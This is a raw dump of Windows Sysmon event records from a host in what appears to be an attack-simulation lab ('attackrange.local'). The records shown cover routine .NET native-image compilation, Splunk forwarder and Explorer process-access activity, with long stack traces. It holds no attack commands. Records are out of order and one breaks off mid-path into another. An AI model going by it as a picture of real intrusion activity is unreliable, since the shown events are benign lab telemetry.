21:04:00.820{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8B03-00000000CF01}7048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.774{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6FF7E92E4733BAA7C88076A4BCFAF2F6,SHA256=B89E791431466300B12A94845FB894EFF700361C0DE52EEC8CAFFC173A46D491,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:00.711{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8A03-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020500Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.695{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8A03-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020499Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:00.695{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8A03-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020498Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:00.649{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\14dc-0\Microsoft.ManagementConsole.dll2021-06-23 21:04:00.649 10341000x800000000000000020497Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:00.367{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020496Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.352{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020495Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:00.352{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8903-00000000CF01}5340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020494Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.305{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D76777A0F3106F3F654D90DC0433253D,SHA256=1E3151D9A1B48D0C00D57E586B7BAC6006A844AEACBD5442D9A180EF830CFC55,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020493Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.180{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8803-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020492Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:00.164{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C0-60D3-8803-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020491Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:00.149{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C0-60D3-8803-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020490Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:00.039{4DB9351A-A1BE-60D3-8603-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13b8-0\Microsoft.Management.UI.dll2021-06-23 21:04:00.039 23542300x800000000000000020514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.852{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64B9A2E1FA312A80E836A7873E55C011,SHA256=EEBB136104542BC1231207A2D4839A47011C0E9A026EA6000F510AA2AD70BBC6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.336{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.320{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:01.320{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C1-60D3-8D03-00000000CF01}6432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.320{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C6D8ECCE6779070A63E6624F356957,SHA256=A7E1B288E451DF966BF1DD7836D9B18C19D30A0F063C597583A2A8EB917668AF,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000020509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:01.008{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C0-60D3-8C03-00000000CF01}7020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020527Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.945{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C2-60D3-9003-00000000CF01}3020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000020526Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.914{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C2-60D3-9003-00000000CF01}3020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020525Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:02.914{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C2-60D3-9003-00000000CF01}3020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020572Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020571Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020570Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020569Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020568Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 